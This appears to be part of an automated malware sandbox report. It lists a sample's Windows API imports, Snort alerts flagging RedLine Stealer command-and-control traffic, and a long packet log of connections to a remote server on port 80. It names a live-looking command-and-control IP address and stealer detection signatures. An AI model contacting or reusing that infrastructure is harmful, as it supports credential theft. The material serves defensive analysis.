                                                                                                                                                                                            USER32.dllGetWindowRect, IsMenu, GetSubMenu, SetDlgItemInt, GetWindowPlacement, CharLowerBuffA, EnableMenuItem, CheckMenuRadioItem, GetSysColor, KillTimer, DestroyIcon, DestroyWindow, PostQuitMessage, GetClientRect, MoveWindow, GetSystemMenu, SetTimer, SetWindowPlacement, InsertMenuItemA, GetMenu, CheckMenuItem, SetMenuItemInfoA, SetActiveWindow, DefDlgProcA, RegisterClassA, EndDialog, SetDlgItemTextA, EnumClipboardFormats, GetClipboardData, CloseClipboard, GetClassInfoA, CallWindowProcA, SetWindowLongA, IsDlgButtonChecked, SetWindowTextA, CheckDlgButton, GetActiveWindow, LoadCursorA, MessageBoxA, wsprintfA, GetDlgItemTextA, SendMessageA, GetCursorPos, TrackPopupMenu, ClientToScreen, DestroyMenu, CreatePopupMenu, AppendMenuA, SendDlgItemMessageA, GetDlgItem
                                                                                                                                                                                            GDI32.dllGetStockObject, DeleteObject, SetBkMode, SetTextColor, CreateFontIndirectA, SelectObject, GetObjectA

                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                            94.142.138.4192.168.2.380496982043234 05/28/23-13:36:08.316634TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response804969894.142.138.4192.168.2.3
                                                                                                                                                                                            192.168.2.394.142.138.449698802043231 05/28/23-13:36:15.171936TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4969880192.168.2.394.142.138.4
                                                                                                                                                                                            192.168.2.394.142.138.449698802043233 05/28/23-13:36:07.137492TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init4969880192.168.2.394.142.138.4

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            May 28, 2023 13:36:06.782174110 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:06.820288897 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:06.820545912 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:07.137491941 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:07.175606966 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:07.215883970 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:07.269748926 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:08.237550020 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:08.275533915 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:08.316633940 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:08.363522053 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:15.171936035 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:15.209758043 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:15.252471924 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:15.252507925 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:15.252528906 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:15.252549887 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:15.252639055 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:15.252701044 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.073013067 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111099005 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111161947 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111196041 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111231089 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111263037 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111295938 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111330032 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.111430883 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149200916 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149267912 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149301052 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149369955 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149369955 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149369955 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149606943 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149641037 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149674892 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149705887 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149736881 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149749041 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149770021 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149802923 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149826050 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149826050 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149895906 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.149897099 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149897099 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.149976969 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.187588930 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.187645912 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.187684059 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.187716007 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.187748909 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.187815905 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.187815905 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.187815905 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.187941074 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.188739061 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.188774109 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.188807011 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.188839912 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.188967943 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.189002037 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.189174891 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.225701094 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.225815058 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.226106882 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.226140976 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.226428986 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264386892 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264441013 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264473915 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264486074 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264508009 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264542103 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264542103 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264548063 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264580965 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264580965 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264609098 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264614105 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264633894 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264647961 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264663935 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264683962 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264713049 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264772892 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264812946 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264846087 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264877081 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264882088 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264909029 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.264923096 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264923096 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.264982939 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.265053988 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.265239000 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.265352964 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.265419006 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.265450954 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.265486002 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.265522003 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.265522003 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.265564919 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302367926 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302423000 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302457094 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302490950 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302526951 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302547932 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302548885 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302623987 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302634954 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302670956 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302700043 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302701950 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302722931 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302759886 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302829981 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302861929 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302890062 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302916050 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.302952051 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.302984953 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303013086 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303016901 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303035021 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303050041 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303076029 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303136110 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303209066 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303222895 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303256989 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303287983 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303327084 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303361893 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303390980 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303423882 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303494930 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303508043 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303692102 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303725958 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303756952 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303760052 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303788900 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303822994 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303837061 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303837061 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303853989 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.303872108 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.303911924 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340616941 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340675116 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340783119 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340790033 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340826035 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340851068 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340859890 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340873957 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340893984 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340923071 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340926886 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340945005 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.340962887 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.340989113 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341068983 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341141939 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341207027 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341368914 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341399908 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341430902 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341432095 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341464043 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341464996 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341490984 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341500044 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341523886 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341540098 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341572046 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341603994 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341638088 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341641903 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341643095 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341670036 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341674089 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341701031 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341702938 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341737032 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341747999 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341769934 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341783047 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341821909 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341855049 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341913939 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.341941118 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.341975927 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342000961 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.342031956 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.342108011 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342140913 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342174053 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342212915 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.342246056 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.342259884 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342294931 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.342338085 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.343166113 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.378779888 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.378839016 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.378871918 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.378904104 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.378911972 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.378911972 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379028082 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379232883 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379270077 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379369974 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379468918 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379503012 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379532099 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379585028 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379774094 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379811049 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379842043 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379843950 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379864931 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379878044 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379903078 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379910946 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379935026 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379945040 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.379966021 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.379977942 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380009890 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380011082 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380032063 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380044937 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380069017 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380079031 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380104065 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380114079 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380141020 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380165100 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380203009 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380234003 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380311012 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380449057 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380481005 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380512953 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380526066 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380548954 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380548954 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380584002 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380593061 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380593061 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380616903 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380650997 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380681992 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380712986 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.380714893 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380714893 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.380755901 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.417222977 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417273998 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417308092 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417341948 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417372942 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417407036 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417416096 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.417416096 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.417484999 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.417527914 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.417715073 CEST804969894.142.138.4192.168.2.3
